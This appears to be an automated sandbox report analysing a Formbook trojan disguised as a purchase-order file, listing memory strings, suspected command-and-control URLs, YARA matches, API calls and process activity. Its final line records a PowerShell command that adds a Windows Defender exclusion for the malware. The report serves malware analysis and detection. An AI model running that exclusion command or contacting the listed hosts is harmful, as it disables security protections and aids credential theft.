            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.33expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8set-cookie: pbid=a31f00fc16b0f85f09508c61c4210a7a3b6cab4e71ea1aab3538c6d4b522c7cf; expires=Tue, 19-Nov-2024 13:19:02 GMT; Max-Age=15552000; path=/link: <https://digitoxmarketing.com/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Thu, 23 May 2024 13:19:02 GMTserver: LiteSpeed
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 23 May 2024 13:19:33 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 23 May 2024 13:19:36 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 23 May 2024 13:19:38 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 23 May 2024 13:19:41 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: close
            Source: openfiles.exe, 00000008.00000002.4441849151.000000000653C000.00000004.10000000.00040000.00000000.sdmp, sXAKgqpSAiGEzhyDsUSKBxPWz.exe, 0000000A.00000002.4440950107.000000000484C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digitoxmarketing.com/a42m/?R0nl4=f64p&vH5=R4g0iLEn
            Source: openfiles.exe, 00000008.00000002.4441849151.0000000005BD0000.00000004.10000000.00040000.00000000.sdmp, sXAKgqpSAiGEzhyDsUSKBxPWz.exe, 0000000A.00000002.4440950107.0000000003EE0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://fedoraproject.org/
            Source: openfiles.exe, 00000008.00000002.4441849151.0000000005BD0000.00000004.10000000.00040000.00000000.sdmp, sXAKgqpSAiGEzhyDsUSKBxPWz.exe, 0000000A.00000002.4440950107.0000000003EE0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://nginx.net/
            Source: PO Copy_7854569.exe, 00000000.00000002.1985288574.000000000323D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: openfiles.exe, 00000008.00000002.4441849151.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, sXAKgqpSAiGEzhyDsUSKBxPWz.exe, 0000000A.00000002.4440950107.0000000003BBC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.2677536768.000000003A8FC000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.litespeedtech.com/error-page
            Source: sXAKgqpSAiGEzhyDsUSKBxPWz.exe, 0000000A.00000002.4442575534.0000000005631000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ratulunabet78.xyz
            Source: sXAKgqpSAiGEzhyDsUSKBxPWz.exe, 0000000A.00000002.4442575534.0000000005631000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ratulunabet78.xyz/a42m/
            Source: openfiles.exe, 00000008.00000002.4444082178.0000000007AD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: openfiles.exe, 00000008.00000002.4441849151.0000000006086000.00000004.10000000.00040000.00000000.sdmp, sXAKgqpSAiGEzhyDsUSKBxPWz.exe, 0000000A.00000002.4440950107.0000000004396000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://browsehappy.com/
            Source: openfiles.exe, 00000008.00000002.4444082178.0000000007AD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: openfiles.exe, 00000008.00000002.4444082178.0000000007AD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: openfiles.exe, 00000008.00000002.4444082178.0000000007AD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: openfiles.exe, 00000008.00000002.4444082178.0000000007AD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: openfiles.exe, 00000008.00000002.4444082178.0000000007AD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: openfiles.exe, 00000008.00000002.4444082178.0000000007AD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: openfiles.exe, 00000008.00000002.4439171150.0000000002B6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: openfiles.exe, 00000008.00000002.4439171150.0000000002B6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: openfiles.exe, 00000008.00000002.4439171150.0000000002B6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: openfiles.exe, 00000008.00000002.4439171150.0000000002B4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: openfiles.exe, 00000008.00000002.4439171150.0000000002B6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: openfiles.exe, 00000008.00000002.4439171150.0000000002B6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: openfiles.exe, 00000008.00000003.2570140522.0000000007A01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: openfiles.exe, 00000008.00000002.4443750014.0000000007780000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.hostinger.com/en/articles/1696789-how-to-change-nameservers-at-hostinger
            Source: openfiles.exe, 00000008.00000002.4444082178.0000000007AD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/

            E-Banking Fraud

            Source: Yara matchFile source: 6.2.PO Copy_7854569.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.PO Copy_7854569.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.4439108659.0000000002AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4440623367.00000000045A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2119855099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2120310446.00000000014E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4438790270.0000000002810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.4442575534.00000000055C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2122191823.0000000002E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 6.2.PO Copy_7854569.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 6.2.PO Copy_7854569.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.4439108659.0000000002AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.4440623367.00000000045A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.2119855099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.2120310446.00000000014E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.4438790270.0000000002810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000A.00000002.4442575534.00000000055C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.2122191823.0000000002E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: PO Copy_7854569.exe, Program.csLarge array initialization: : array initializer size 665116
            Source: 8.2.openfiles.exe.4e7cd08.2.raw.unpack, Program.csLarge array initialization: : array initializer size 665116
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0042AE13 NtClose,6_2_0042AE13
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672B60 NtClose,LdrInitializeThunk,6_2_01672B60
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_01672DF0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_01672C70
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016735C0 NtCreateMutant,LdrInitializeThunk,6_2_016735C0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01674340 NtSetContextThread,6_2_01674340
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01674650 NtSuspendThread,6_2_01674650
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672BE0 NtQueryValueKey,6_2_01672BE0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672BF0 NtAllocateVirtualMemory,6_2_01672BF0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672BA0 NtEnumerateValueKey,6_2_01672BA0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672B80 NtQueryInformationFile,6_2_01672B80
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672AF0 NtWriteFile,6_2_01672AF0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672AD0 NtReadFile,6_2_01672AD0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672AB0 NtWaitForSingleObject,6_2_01672AB0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672D30 NtUnmapViewOfSection,6_2_01672D30
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672D00 NtSetInformationFile,6_2_01672D00
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672D10 NtMapViewOfSection,6_2_01672D10
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672DD0 NtDelayExecution,6_2_01672DD0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672DB0 NtEnumerateKey,6_2_01672DB0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672C60 NtCreateKey,6_2_01672C60
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672C00 NtQueryInformationProcess,6_2_01672C00
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672CF0 NtOpenProcess,6_2_01672CF0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672CC0 NtQueryVirtualMemory,6_2_01672CC0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672CA0 NtQueryInformationToken,6_2_01672CA0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Code function: 6_2_01672F60 NtCreateProcessEx, 6_2_01672F60
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Code function: 6_2_01672F30 NtCreateSection, 6_2_01672F30
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Code function: 6_2_01672FE0 NtCreateFile, 6_2_01672FE0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Code function: 6_2_01672FA0 NtQuerySection, 6_2_01672FA0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Code function: 6_2_01672FB0 NtResumeThread, 6_2_01672FB0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Code function: 6_2_01672F90 NtProtectVirtualMemory, 6_2_01672F90
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Code function: 6_2_01672E30 NtWriteVirtualMemory, 6_2_01672E30
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Code function: 6_2_01672EE0 NtQueueApcThread, 6_2_01672EE0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Code function: 6_2_01672EA0 NtAdjustPrivilegesToken, 6_2_01672EA0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Code function: 6_2_01672E80 NtReadVirtualMemory, 6_2_01672E80
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Code function: 6_2_01673010 NtOpenDirectoryObject, 6_2_01673010
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Code function: 6_2_01673090 NtSetValueKey, 6_2_01673090
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Code function: 6_2_016739B0 NtGetContextThread, 6_2_016739B0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Code function: 6_2_01673D70 NtOpenThread, 6_2_01673D70
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Code function: 6_2_01673D10 NtOpenProcessToken, 6_2_01673D10
            Source: C:\Windows\SysWOW64\openfiles.exe Code function: 8_2_048C4650 NtSuspendThread, LdrInitializeThunk, 8_2_048C4650
            Source: C:\Windows\SysWOW64\openfiles.exe Code function: 8_2_048C4340 NtSetContextThread, LdrInitializeThunk, 8_2_048C4340
            Source: C:\Windows\SysWOW64\openfiles.exe Code function: 8_2_048C2CA0 NtQueryInformationToken, LdrInitializeThunk, 8_2_048C2CA0
            Source: C:\Windows\SysWOW64\openfiles.exe Code function: 8_2_048C2C60 NtCreateKey, LdrInitializeThunk, 8_2_048C2C60
            Source: C:\Windows\SysWOW64\openfiles.exe Code function: 8_2_048C2C70 NtFreeVirtualMemory, LdrInitializeThunk, 8_2_048C2C70
            Source: C:\Windows\SysWOW64\openfiles.exe Code function: 8_2_048C2DD0 NtDelayExecution, LdrInitializeThunk, 8_2_048C2DD0
            Source: C:\Windows\SysWOW64\openfiles.exe Code function: 8_2_048C2DF0 NtQuerySystemInformation, LdrInitializeThunk, 8_2_048C2DF0
            Source: C:\Windows\SysWOW64\openfiles.exe Code function: 8_2_048C2D10 NtMapViewOfSection, LdrInitializeThunk, 8_2_048C2D10
            Source: C:\Windows\SysWOW64\openfiles.exe Code function: 8_2_048C2D30 NtUnmapViewOfSection, LdrInitializeThunk, 8_2_048C2D30
            Source: C:\Windows\SysWOW64\openfiles.exe Code function: 8_2_048C2E80 NtReadVirtualMemory, LdrInitializeThunk, 8_2_048C2E80
            Source: C:\Windows\SysWOW64\openfiles.exe Code function: 8_2_048C2EE0 NtQueueApcThread, LdrInitializeThunk, 8_2_048C2EE0
            Source: C:\Windows\SysWOW64\openfiles.exe Code function: 8_2_048C2FB0 NtResumeThread, LdrInitializeThunk, 8_2_048C2FB0
            Source: C:\Windows\SysWOW64\openfiles.exe Code function: 8_2_048C2FE0 NtCreateFile, LdrInitializeThunk, 8_2_048C2FE0
            Source: C:\Windows\SysWOW64\openfiles.exe Code function: 8_2_048C2F30 NtCreateSection, LdrInitializeThunk, 8_2_048C2F30
            Source: C:\Windows\SysWOW64\openfiles.exe Code function: 8_2_048C2AD0 NtReadFile, LdrInitializeThunk, 8_2_048C2AD0
            Source: C:\Windows\SysWOW64\openfiles.exe Code function: 8_2_048C2AF0 NtWriteFile, LdrInitializeThunk, 8_2_048C2AF0
            Source: C:\Windows\SysWOW64\openfiles.exe Code function: 8_2_048C2BA0 NtEnumerateValueKey, LdrInitializeThunk, 8_2_048C2BA0
            Source: C:\Windows\SysWOW64\openfiles.exe Code function: 8_2_048C2BE0 NtQueryValueKey, LdrInitializeThunk, 8_2_048C2BE0
            Source: C:\Windows\SysWOW64\openfiles.exe Code function: 8_2_048C2BF0 NtAllocateVirtualMemory, LdrInitializeThunk, 8_2_048C2BF0
            Source: C:\Windows\SysWOW64\openfiles.exe Code function: 8_2_048C2B60 NtClose, LdrInitializeThunk, 8_2_048C2B60
            Source: C:\Windows\SysWOW64\openfiles.exe Code function: 8_2_048C35C0 NtCreateMutant, LdrInitializeThunk, 8_2_048C35C0
            Source: C:\Windows\SysWOW64\openfiles.exe Code function: 8_2_048C39B0 NtGetContextThread, LdrInitializeThunk, 8_2_048C39B0
            Source: C:\Windows\SysWOW64\openfiles.exe Code function: 8_2_048C2CC0 NtQueryVirtualMemory, 8_2_048C2CC0
            Source: C:\Windows\SysWOW64\openfiles.exe Code function: 8_2_048C2CF0 NtOpenProcess, 8_2_048C2CF0
            Source: C:\Windows\SysWOW64\openfiles.exe Code function: 8_2_048C2C00 NtQueryInformationProcess, 8_2_048C2C00
            Source: C:\Windows\SysWOW64\openfiles.exe Code function: 8_2_048C2DB0 NtEnumerateKey, 8_2_048C2DB0
            Source: C:\Windows\SysWOW64\openfiles.exe Code function: 8_2_048C2D00 NtSetInformationFile, 8_2_048C2D00
            Source: C:\Windows\SysWOW64\openfiles.exe Code function: 8_2_048C2EA0 NtAdjustPrivilegesToken, 8_2_048C2EA0
            Source: C:\Windows\SysWOW64\openfiles.exe Code function: 8_2_048C2E30 NtWriteVirtualMemory, 8_2_048C2E30
            Source: C:\Windows\SysWOW64\openfiles.exe Code function: 8_2_048C2F90 NtProtectVirtualMemory, 8_2_048C2F90
            Source: C:\Windows\SysWOW64\openfiles.exe Code function: 8_2_048C2FA0 NtQuerySection, 8_2_048C2FA0
            Source: C:\Windows\SysWOW64\openfiles.exe Code function: 8_2_048C2F60 NtCreateProcessEx, 8_2_048C2F60
            Source: C:\Windows\SysWOW64\openfiles.exe Code function: 8_2_048C2AB0 NtWaitForSingleObject, 8_2_048C2AB0
            Source: C:\Windows\SysWOW64\openfiles.exe Code function: 8_2_048C2B80 NtQueryInformationFile, 8_2_048C2B80
            Source: C:\Windows\SysWOW64\openfiles.exe Code function: 8_2_048C3090 NtSetValueKey, 8_2_048C3090
            Source: C:\Windows\SysWOW64\openfiles.exe Code function: 8_2_048C3010 NtOpenDirectoryObject, 8_2_048C3010
            Source: C:\Windows\SysWOW64\openfiles.exe Code function: 8_2_048C3D10 NtOpenProcessToken, 8_2_048C3D10
            Source: C:\Windows\SysWOW64\openfiles.exe Code function: 8_2_048C3D70 NtOpenThread, 8_2_048C3D70
            Source: C:\Windows\SysWOW64\openfiles.exe Code function: 8_2_02837720 NtCreateFile, 8_2_02837720
            Source: C:\Windows\SysWOW64\openfiles.exe Code function: 8_2_02837A00 NtClose, 8_2_02837A00
            Source: C:\Windows\SysWOW64\openfiles.exe Code function: 8_2_02837B50 NtAllocateVirtualMemory, 8_2_02837B50
            Source: C:\Windows\SysWOW64\openfiles.exe Code function: 8_2_02837880 NtReadFile, 8_2_02837880
            Source: C:\Windows\SysWOW64\openfiles.exe Code function: 8_2_02837960 NtDeleteFile, 8_2_02837960
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Code function: String function: 0162B970 appears 280 times
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Code function: String function: 016AEA12 appears 86 times
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Code function: String function: 01687E54 appears 111 times
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Code function: String function: 016BF290 appears 105 times
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Code function: String function: 01675130 appears 58 times
            Source: C:\Windows\SysWOW64\openfiles.exe Code function: String function: 048FEA12 appears 86 times
            Source: C:\Windows\SysWOW64\openfiles.exe Code function: String function: 0490F290 appears 105 times
            Source: C:\Windows\SysWOW64\openfiles.exe Code function: String function: 0487B970 appears 280 times
            Source: C:\Windows\SysWOW64\openfiles.exe Code function: String function: 048D7E54 appears 111 times
            Source: C:\Windows\SysWOW64\openfiles.exe Code function: String function: 048C5130 appears 58 times
            Source: PO Copy_7854569.exe, 00000000.00000002.2000322290.00000000075B9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs PO Copy_7854569.exe
            Source: PO Copy_7854569.exe, 00000000.00000002.1981785201.000000000137E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs PO Copy_7854569.exe
            Source: PO Copy_7854569.exe, 00000000.00000002.1985288574.00000000031D1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs PO Copy_7854569.exe
            Source: PO Copy_7854569.exe, 00000000.00000002.2000181875.0000000007560000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs PO Copy_7854569.exe
            Source: PO Copy_7854569.exe, 00000000.00000002.2003385709.0000000007EF0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs PO Copy_7854569.exe
            Source: PO Copy_7854569.exe, 00000006.00000002.2120087862.00000000010FE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameopnfiles.exej% vs PO Copy_7854569.exe
            Source: PO Copy_7854569.exe, 00000006.00000002.2120087862.00000000010D8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameopnfiles.exej% vs PO Copy_7854569.exe
            Source: PO Copy_7854569.exe, 00000006.00000002.2120419715.000000000172D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs PO Copy_7854569.exe
            Source: PO Copy_7854569.exe Binary or memory string: OriginalFilenamegTWh.exeJ vs PO Copy_7854569.exe
            Source: PO Copy_7854569.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Matched in the following sources:
            Source: 6.2.PO Copy_7854569.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: 6.2.PO Copy_7854569.exe.400000.0.unpack, type: UNPACKEDPE
            Source: 00000008.00000002.4439108659.0000000002AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: 00000008.00000002.4440623367.00000000045A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: 00000006.00000002.2119855099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: 00000006.00000002.2120310446.00000000014E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: 00000008.00000002.4438790270.0000000002810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: 0000000A.00000002.4442575534.00000000055C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: 00000006.00000002.2122191823.0000000002E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: PO Copy_7854569.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.PO Copy_7854569.exe.7ef0000.11.raw.unpack, sAQsu8yt6lLQbnQvsb.cs Security API names: _0020.SetAccessControl
            Source: 0.2.PO Copy_7854569.exe.7ef0000.11.raw.unpack, sAQsu8yt6lLQbnQvsb.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.PO Copy_7854569.exe.7ef0000.11.raw.unpack, sAQsu8yt6lLQbnQvsb.cs Security API names: _0020.AddAccessRule
            Source: 0.2.PO Copy_7854569.exe.45d2860.7.raw.unpack, EMiiKLWxXWlFcu6Hvp.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.PO Copy_7854569.exe.7ef0000.11.raw.unpack, EMiiKLWxXWlFcu6Hvp.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.PO Copy_7854569.exe.45d2860.7.raw.unpack, sAQsu8yt6lLQbnQvsb.cs Security API names: _0020.SetAccessControl
            Source: 0.2.PO Copy_7854569.exe.45d2860.7.raw.unpack, sAQsu8yt6lLQbnQvsb.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.PO Copy_7854569.exe.45d2860.7.raw.unpack, sAQsu8yt6lLQbnQvsb.cs Security API names: _0020.AddAccessRule
            Source: 0.2.PO Copy_7854569.exe.7680000.10.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
            Source: 0.2.PO Copy_7854569.exe.357b6e0.6.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
            Source: 0.2.PO Copy_7854569.exe.322382c.3.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
            Source: 0.2.PO Copy_7854569.exe.3213820.5.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
            Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@12/7@23/10
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO Copy_7854569.exe.log
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5036:120:WilError_03
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hbsyqs0r.n3f.ps1
            Source: PO Copy_7854569.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: openfiles.exe, 00000008.00000003.2570582633.0000000002B89000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000008.00000003.2573170813.0000000002BB3000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000008.00000003.2570681130.0000000002BAA000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000008.00000002.4439171150.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000008.00000002.4439171150.0000000002BAA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: PO Copy_7854569.exe Virustotal: Detection: 45%
            Source: PO Copy_7854569.exe ReversingLabs: Detection: 68%
            Source: unknown Process created: C:\Users\user\Desktop\PO Copy_7854569.exe "C:\Users\user\Desktop\PO Copy_7854569.exe"
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO Copy_7854569.exe"
